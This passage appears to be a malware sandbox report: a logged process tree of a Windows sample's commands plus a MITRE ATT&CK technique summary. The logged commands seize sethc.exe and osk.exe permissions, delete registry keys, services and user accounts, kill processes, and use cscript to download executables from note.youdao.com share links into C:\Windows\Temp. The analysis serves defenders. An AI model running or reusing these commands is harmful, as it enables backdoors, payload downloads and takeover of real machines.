  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:1900
  [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\system32\sethc.exe /g Administrators:f | PID:764
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:1712
  [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\system32\sethc.exe /e /g Users:r | PID:296
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:2808
  [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\system32\sethc.exe /e /g Administrators:r | PID:1968
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:2856
  [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\system32\sethc.exe /e /d SERVICE | PID:2652
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo Y" | PID:324
  [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\system32\sethc.exe /e /d "network service" | PID:688
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:2632
  [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\system32\sethc.exe /e /g system:r | PID:2448
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /f C:\Windows\system32\osk.exe /a | PID:4232 | Modifies file permissions; Suspicious use of AdjustPrivilegeToken
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:5144
  [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\system32\osk.exe /g Administrators:f | PID:5156
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:5916
  [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\system32\osk.exe /e /g Users:r | PID:5924
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:5964
  [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\system32\osk.exe /e /g Administrators:r | PID:5980
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:5996
  [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\system32\osk.exe /e /d SERVICE | PID:6004
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo Y" | PID:6044
  [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\system32\osk.exe /e /d "network service" | PID:6052
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:6084
  [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\system32\osk.exe /e /g system:r | PID:6092
  [3] C:\Windows\SysWOW64\reg.exe | reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /f | PID:6124
  [3] C:\Windows\SysWOW64\reg.exe | reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smss.exe" /f | PID:1192
  [3] C:\Windows\SysWOW64\reg.exe | reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sqlser.exe" /f | PID:5148
  [3] C:\Windows\SysWOW64\reg.exe | reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchost.exe" /f | PID:5892
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /f C:\Windows\Fonts\smss.exe /a | PID:5296 | Modifies file permissions; Suspicious use of AdjustPrivilegeToken
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:5920
  [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\Fonts\smss.exe /g everyone:f | PID:5948
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /f C:\Windows\system32\sethc.exe /a | PID:5968 | Modifies file permissions
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:5984
  [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\system32\sethc.exe /g system:f | PID:6000
  [3] C:\Windows\SysWOW64\cscript.exe | cscript xxoo.vbs "http://note.youdao.com/yws/api/personal/file/WEBb6b3acba5104f41c9b364680f28de9f9?method=download&inline=true&shareKey=c5aa6f51dffffee47d0ee728d894f348" C:\Windows\Temp\0AHM.exe | PID:6080
  [3] C:\Windows\SysWOW64\cscript.exe | cscript xxoo.vbs "http://note.youdao.com/yws/api/personal/file/WEB413662f5cc07627e58c48fe17d4d29d0?method=download&inline=true&shareKey=eb9998a97429406e7ea9f4bf2bf14549" C:\Windows\Temp\0osk.exe | PID:4976 | Blocklisted process makes network request
  [3] C:\Windows\SysWOW64\PING.EXE | ping -n 5 127.1 | PID:1724 | Runs ping.exe
  [3] C:\Windows\SysWOW64\sc.exe | sc stop HostManger | PID:1424 | Launches sc.exe
  [3] C:\Windows\SysWOW64\sc.exe | sc delete HostManger | PID:5804 | Launches sc.exe
  [3] C:\Windows\SysWOW64\sc.exe | sc stop Hostserver | PID:5132
  [3] C:\Windows\SysWOW64\sc.exe | sc delete Hostserver | PID:5136 | Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc stop ServicesMain3⤵
- Launches sc.exe
PID:4852
-
-
C:\Windows\SysWOW64\sc.exesc delete ServicesMain3⤵PID:4856
-
-
    C:\Windows\SysWOW64\takeown.exe | takeown /f C:\Windows\fonts /a | PID 3880
      - Modifies file permissions
    C:\Windows\SysWOW64\takeown.exe | takeown /f C:\Windows\Fonts\rundllhost.exe /a | PID 1724
      - Modifies file permissions
    C:\Windows\SysWOW64\takeown.exe | takeown /f C:\Windows\Fonts\dlllhost.exe /a | PID 3516
      - Modifies file permissions
    C:\Windows\SysWOW64\takeown.exe | takeown /f C:\Windows\Fonts\conhost.exe /a | PID 3916
      - Modifies file permissions
    C:\Windows\SysWOW64\takeown.exe | takeown /f C:\Windows\Fonts\svchost.exe /a | PID 5768
      - Modifies file permissions
    C:\Windows\SysWOW64\takeown.exe | takeown /f C:\Windows\Fonts\csrss.exe /a | PID 4464
      - Modifies file permissions
    C:\Windows\SysWOW64\takeown.exe | takeown /f C:\Windows\Fonts\KvMonXP.exe /a | PID 3076
      - Modifies file permissions
    C:\Windows\SysWOW64\attrib.exe | attrib -s -h -r C:\Windows\Fonts\KvMonXP.exe | PID 1404
      - Views/modifies file attributes
    C:\Windows\SysWOW64\attrib.exe | attrib -s -h -r C:\Windows\Fonts\rundllhost.exe | PID 1892
      - Views/modifies file attributes
    C:\Windows\SysWOW64\attrib.exe | attrib -s -h -r C:\Windows\Fonts\dlllhost.exe | PID 1928
      - Views/modifies file attributes
    C:\Windows\SysWOW64\attrib.exe | attrib -s -h -r C:\Windows\Fonts\conhost.exe | PID 1492
      - Views/modifies file attributes
    C:\Windows\SysWOW64\attrib.exe | attrib -s -h -r C:\Windows\Fonts\svchost.exe | PID 1920
      - Views/modifies file attributes
    C:\Windows\SysWOW64\attrib.exe | attrib -s -h -r C:\Windows\Fonts\csrss.exe | PID 1700
      - Views/modifies file attributes
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID 1640
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Windows\Fonts\rundllhost.exe" /g everyone:f | PID 3792
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID 4700
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Windows\Fonts\dlllhost.exe" /g everyone:f | PID 4692
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID 4640
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Windows\Fonts\conhost.exe" /g everyone:f | PID 4636
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID 1896
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Windows\Fonts\svchost.exe" /g everyone:f | PID 1916
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID 1316
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Windows\Fonts\csrss.exe" /g everyone:f | PID 1540
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID 5948
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Windows\Fonts\KvMonXP.exe" /g everyone:f | PID 3108
    C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic process where "name='csrss.exe' and ExecutablePath='C:\\Windows\\Fonts\\csrss.exe'" call Terminate | PID 5556
      - Kills process with WMI
    C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic process where "name='svchost.exe' and ExecutablePath='C:\\Windows\\Fonts\\svchost.exe'" call Terminate | PID 5184
      - Kills process with WMI
    C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic process where "name='conhost.exe' and ExecutablePath='C:\\Windows\\Fonts\\conhost.exe'" call Terminate | PID 3976
      - Kills process with WMI
    C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic process where "name='lsass.exe' and ExecutablePath='C:\\Windows\\Fonts\\lsass.exe'" call Terminate | PID 4948
      - Kills process with WMI
    C:\Windows\SysWOW64\taskkill.exe | taskkill /f /t /im rundllhost.exe | PID 5244
      - Kills process with taskkill
    C:\Windows\SysWOW64\taskkill.exe | taskkill /f /t /im dlllhost.exe | PID 4028
      - Kills process with taskkill
    C:\Windows\SysWOW64\taskkill.exe | taskkill /f /t /im KvMonXP.exe | PID 4584
      - Kills process with taskkill
    C:\Windows\SysWOW64\taskkill.exe | taskkill /f /t /im dllhots.exe | PID 3360
      - Kills process with taskkill
    C:\Windows\SysWOW64\taskkill.exe | taskkill /f /t /im d11hots.exe | PID 5920
      - Kills process with taskkill
    C:\Windows\SysWOW64\reg.exe | reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvMonXP.exe" /f | PID 3092
    C:\Windows\SysWOW64\sc.exe | sc stop MicrosotMais | PID 4588
    C:\Windows\SysWOW64\sc.exe | sc delete MicrosotMais | PID 4584
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe | sc delete MicrosotMaims | PID 3376
    C:\Windows\SysWOW64\sc.exe | sc stop MicrosotMaims | PID 3388
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe | sc stop MicrosotSais | PID 3428
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe | sc delete MicrosotSais | PID 3440
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe | sc stop MicrosotSaims | PID 3456
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe | sc delete MicrosotSaims | PID 2340
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe | sc stop ServiceSaims | PID 3464
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe | sc delete ServiceSaims | PID 4648
    C:\Windows\SysWOW64\sc.exe | sc stop ServiceSais | PID 988
    C:\Windows\SysWOW64\sc.exe | sc delete ServiceSais | PID 4632
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe | sc stop ServiceMais | PID 5116
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe | sc delete ServiceMais | PID 4700
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe | sc stop ServiceMaims | PID 4660
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe | sc delete ServiceMaims | PID 3856
    C:\Windows\SysWOW64\sc.exe | sc stop NetPipeAtcivator | PID 1044
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe | sc delete NetPipeAtcivator | PID 4644
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe | sc stop FormManger | PID 4668
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe | sc delete FormManger | PID 4672
    C:\Windows\SysWOW64\sc.exe | sc stop Famserver | PID 1796
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe | sc delete Famserver | PID 3504
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe | sc delete Samsorver | PID 4748
    C:\Windows\SysWOW64\sc.exe | sc stop Samsorver | PID 4660
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe | sc delete Microsarver | PID 1384
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe | sc stop Microsarver | PID 3852
      - Launches sc.exe
    C:\Windows\SysWOW64\net.exe | net user mm123$ /del | PID 1896
      C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 user mm123$ /del | PID 3988
    C:\Windows\SysWOW64\net.exe | net user admin$ /del | PID 5840
      C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 user admin$ /del | PID 5856
    C:\Windows\SysWOW64\net.exe | net user aliyun /del | PID 1756
      C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 user aliyun /del | PID 1628
    C:\Windows\SysWOW64\net.exe | net user lcy /del | PID 4568
      C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 user lcy /del | PID 4536
    C:\Windows\SysWOW64\taskkill.exe | taskkill /f /t /im rundll32.exe | PID 4508
      - Kills process with taskkill
    C:\Windows\SysWOW64\cscript.exe | cscript xxoo.vbs "http://note.youdao.com/yws/api/personal/file/WEBba2227a56359db179ebf9a924bc233d3?method=download&inline=true&shareKey=89273cb26401400b293be41d8c5cffa5" C:\Windows\Temp\smss.exe | PID 1272
      - Blocklisted process makes network request
    C:\Windows\SysWOW64\PING.EXE | ping 127.1 -n 3 | PID 2300
      - Runs ping.exe
    C:\Windows\SysWOW64\sc.exe | sc start Microsarver | PID 2956
    C:\Windows\SysWOW64\sc.exe | sc start Microsarver | PID 1540
      - Launches sc.exe
  C:\Windows\SysWOW64\WScript.exe | "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tem.vbs" | PID 2804
    - Deletes itself
C:\Windows\system32\taskeng.exe | taskeng.exe {C6945E12-B248-423D-82A1-A1293C9A561B} S-1-5-18:NT AUTHORITY\System:Service: | PID 5452
  C:\windows\Installer\conhost.exe | C:\windows\Installer\conhost.exe | PID 5372
    - Executes dropped EXE
    - Drops file in Program Files directory
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted | PID 5660
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (1)
- Scheduled Task/Job (1)
- System Services (2)
- Service Execution (2)
Persistence
- Boot or Logon Autostart Execution (1)
- Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (3)
- Windows Service (3)
- Scheduled Task/Job (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1)
- Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (3)
- Windows Service (3)
- Scheduled Task/Job (1)
Defense Evasion
- File and Directory Permissions Modification (1)
- Hide Artifacts (2)
- Hidden Files and Directories (2)
- Impair Defenses (2)
- Disable or Modify System Firewall (1)
- Modify Registry (2)
Downloads